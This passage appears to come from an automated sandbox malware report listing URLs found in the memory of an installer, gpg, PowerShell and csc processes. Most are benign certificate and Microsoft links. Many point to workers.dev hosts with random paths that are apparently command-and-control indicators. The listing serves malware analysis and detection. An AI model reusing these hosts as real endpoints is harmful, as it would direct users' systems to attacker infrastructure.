http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.jsT
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000017.00000002.3434485364.000001E964A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7
Source: svchost.exe, 0000001D.00000002.2858871850.0000018B7F600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD90E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BD942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ec2-server.bayaj19162.workers.dev
Source: svchost.exe, 0000001D.00000003.1203909963.0000018B7F530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000017.00000002.3346373467.000001E94DC4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94DAE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94DCF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94D9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nginx-server.paxivo2460.workers.dev
Source: VirtManage.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000017.00000002.3410839615.000001E95C5F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3413620030.00000234D4F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.915617704.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000003.00000002.920512701.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 00000005.00000002.931456572.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000A.00000002.992267349.00000000630A7000.00000008.00000001.01000000.0000000C.sdmp, gpg.exe, 0000000C.00000002.997866045.00000000630A7000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.3346373467.000001E94C7A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E59F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3346373467.000001E94E5C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.org
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg-agent.exe.0.drString found in binary or memory: https://bugs.gnupg.orgGnuPGgpggpgsmgpg-agentgpgtarEMAILGNUPGGPGGPGSMGPG_AGENTSCDAEMONTPM2DAEMONDIRMN
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.3402127294.00000234CCEC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.b
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj1
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.worke
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.de
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3422307009.00000234D5410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815303867.0000019761ACE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815239590.0000019761ADF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817631726.000001976341B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815378230.0000019761ADF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818162447.0000019761A34000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818656888.0000019761A43000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818288022.0000019761A3A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1818336435.0000019761A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//2TGT15/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//54toj/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/X
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ec2-server.bayaj19162.workers.dev//6rbtnMxxv10y0aC/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//A5iiZ35fPBxq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//D/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//DGC/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ELlFq8DghJwG/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ELlFq8DghJwG/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//IqKaO8ROWJzm2yU/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//JA4/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//JWWnmtH4QCwfR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Jxxnljedg7S3/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//KCAKE1z1Kqo6wcb/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//KyE05/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//L0oe8wZHxLwO2Oz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//LRLtXY4mUbF/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//LRLtXY4mUbF/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD935000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//P/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//PUfFT8mzOuxA/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//PfQC2uxgaKZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//QvKf4lQ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RIPZ/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RmTVLvFEr1/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//RmTVLvFEr1/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//T6Ft/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//TAswTKHs8qzhXjg/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Y/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//Z57KoIZrwtX/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ZArXzdh2B/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//bTuYBk7MX/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//bmi/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//cedo3Vv/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//e8/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ftm01GsPbjNqF/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//gJd1ph1r2jf/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//gwOQyuLZR6B5FB/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hUiWpPOO6/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD993000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hc4mXSWuVmTMqhy/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDCD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//hc4mXSWuVmTMqhy/p
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//jXNNld0OMq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//k/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//l/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ml/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//o6JCV/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//oPtH3YR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//osqKq/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//qDVkzlfqqiYTH30/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDD01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//qz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BE0A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//rmjS1Nz/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD90E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//rmjS1Nz/wtX//OR/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//sespjFc3mtPiU/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//smT5VjqNG/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ueWgFP/
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BDE18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ec2-server.bayaj19162.workers.dev//ueWgFP/p
